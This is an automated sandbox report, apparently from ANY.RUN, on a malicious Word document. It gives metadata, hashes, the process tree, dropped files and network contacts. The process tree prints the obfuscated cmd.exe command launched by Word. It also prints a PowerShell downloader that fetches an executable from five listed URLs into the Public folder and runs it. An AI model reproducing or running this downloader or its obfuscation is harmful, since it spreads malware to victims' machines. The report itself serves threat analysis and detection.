File name: | DOC-P55625339.doc |
Full analysis: | https://app.any.run/tasks/451ccc56-18a2-409d-8283-b1815d72cd80 |
Verdict: | Malicious activity |
Analysis date: | April 23, 2019, 11:12:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Bryce, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 26 19:22:00 2018, Last Saved Time/Date: Wed Sep 26 19:22:00 2018, Number of Pages: 1, Number of Words: 8, Number of Characters: 47, Security: 0 |
MD5: | EB6FDB69C14C679D2548F522471ADCFA |
SHA1: | B3FFE4E69D76AC9C88C7B0144279B1D67AC21172 |
SHA256: | A5CE75229962EE88765EE054CD51C790F2A84B190DA893FE8C13F4CCCD5E9DBE |
SSDEEP: | 1536:qptJlmrJpmxlRw99NBT+aQ/MemS8yxay880tWcGFedW+Fxx7atf1PbdqmIDVdCOS:2te2dw99ftJKcqijFxxK1PbQ5VIJ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Bryce |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:09:26 18:22:00 |
ModifyDate: | 2018:09:26 18:22:00 |
Pages: | 1 |
Words: | 8 |
Characters: | 47 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 54 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
296 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC-P55625339.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3764 | CMd \/\\ \ //\/\/ /V:ON/C"set +'[{=7a20 07a2 7a20 a720 a207 a702 207a a270 0a27 072a 702a 7a20 20a7 02a7 a027 07a2 70a2 270a}a720}07a2{720ah7a02c20a7t70a2a702aca702}a072;7a02k270aaa702e270ar0a27ba027;70a2Oa270j207aP270a$07a2 270am720ae207at7a20Ia207-72a0e0a27k270ao2a07va270n7a20Ia702;07a2)0a27O70a2j07a2P072a$27a0 2a07,27a0s0a27J702aba207$27a0(72a0e07a2la270ia720F70a2da027a2a07o027al270an02a7w2a70o720aD720a.a702U20a7U720aYa072$02a7{702ay70a2r27a0t27a0{7a02)a720z720aj702aD207a$02a7 7a20n72a0i02a7 702asa207J702aba207$027a(0a72ha720c2a70aa207e2a70r02a7o7a20f7a02;02a7'72a0e072ax270aea207.720a'2a07+720aj7a20d2a70m07a2$a072+a270'a720\a720'27a0+07a2c07a2i7a20l7a20b7a20u702ap70a2:27a0v0a72na072e20a7$0a27=27a0O072aj072aP027a$72a0;27a0'27a0872a057a02572a0'2a07 270a=72a0 70a2ja270d0a72m207a$7a02;027a)a027'0a72@0a27'7a02(0a27t207ai072ala720p207aS70a2.a702'0a72Za027Z270aT07a2S7a20/27a0m702ao270ac720a.a702g07a2n2a70o0a27ua270d0a27ia027aa072ha072a7a20u072ac02a7ma702e0a72r702a.072awa720w2a70w72a0/027a/a270:72a0p7a20ta720t702ah27a0@27a0l20a73a027/072am27a0o72a0c027a.027ara072a20a7e720ara270o2a07g7a20e027ara720g072a/2a70/027a:0a27p072at70a2ta027h2a70@270aoa720F2a07/702ama270oa270c27a0.a207s70a2e27a0i027ar0a72t27a0s0a72u027ad0a27n07a2i70a2l702ala027ea270b07a2s02a7ia720/720a/27a0:27a0p02a7t07a2ta702ha027@02a7x02a7o2a70/27a0n702ac7a02.a0274a027120a710a72wa702y2a07ya027.0a72w02a7w20a7w027a/72a0/7a20:27a0p70a2t2a07ta720h2a70@a720q0a27a0a27I20a7ra207L72a0/a072m07a2oa720c072a.70a2r70a2e072ag0a27g720aia072b0a72t2a70c702aaa270/a720/70a2:72a0p072ata072t2a70h207a'a072=a027z02a7j270aD07a2$2a70;7a02t7a02n027ae07a2i072al20a7C072ab7a02e7a20W027a.0a27t07a2e720aNa270 2a07t07a2c7a20e70a2ja720b027ao2a07-27a0w20a7ea207n02a7=a072U720aU072aY20a7$a702 a720l0a72l027aea072h72a0sa702ra702e720aw702aoa027p&&for /L %L in (1754;-5;4)do set -\,`=!-\,`!!+'[{:~%L,1!&&if %L equ 4 call %-\,`:*-\,`!=%" | C:\Windows\system32\CMd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2036 | powershell $YUU=new-object Net.WebClient;$Djz='http://actbigger.com/LrIaq@http://www.yyw114.cn/ox@http://isbellindustries.com/Fo@http://gregorear.com/3l@http://www.remcuahaiduong.com/STZZ'.Split('@');$mdj = '558';$PjO=$env:public+'\'+$mdj+'.exe';foreach($bJs in $Djz){try{$YUU.DownloadFile($bJs, $PjO);Invoke-Item $PjO;break;}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
544 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5D5E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2036 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JDX878CY377Z0FF544TB.temp | — | |
MD5:— | SHA256:— | |||
544 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs89FC.tmp | — | |
MD5:— | SHA256:— | |||
544 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs8A0C.tmp | — | |
MD5:— | SHA256:— | |||
2036 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$C-P55625339.doc | pgc | |
MD5:3FCB357C971FD6067EEF97B8DFB18EB4 | SHA256:663A6C93723583A92D6B08A3B3467EB31ADA79E8B29E9879546119748EB30F81 | |||
2036 | powershell.exe | C:\Users\Public\558.exe | html | |
MD5:52473F80AE1F72151BE17C1760A19A3F | SHA256:23AFEFA1459DEAD7F12A83A98398D2CB64E6EA5246B024C870382C73F9B74DCB | |||
2036 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe6df8.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
296 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D2E15D5C604345F8015FBF3360A0E0AC | SHA256:1F21FE58E7748D2F29BC412D23F15565CB01B44D017CC45BB01701708A9978D6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2036 | powershell.exe | GET | 403 | 23.229.233.131:80 | http://actbigger.com/LrIaq | US | html | 395 b | malicious |
2036 | powershell.exe | GET | 403 | 107.151.181.20:80 | http://www.yyw114.cn/ox | US | text | 17 b | malicious |
2036 | powershell.exe | GET | 301 | 162.215.249.63:80 | http://gregorear.com/3l | US | html | 295 b | malicious |
2036 | powershell.exe | GET | 200 | 162.215.249.63:80 | http://gregorear.com/3l/ | US | html | 830 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2036 | powershell.exe | 107.151.181.20:80 | www.yyw114.cn | Zenlayer Inc | US | malicious |
2036 | powershell.exe | 23.229.233.131:80 | actbigger.com | GoDaddy.com, LLC | US | malicious |
2036 | powershell.exe | 162.215.249.63:80 | gregorear.com | Unified Layer | US | malicious |
Domain | IP | Reputation |
---|---|---|
actbigger.com |
| malicious |
www.yyw114.cn |
| malicious |
isbellindustries.com |
| malicious |
gregorear.com |
| malicious |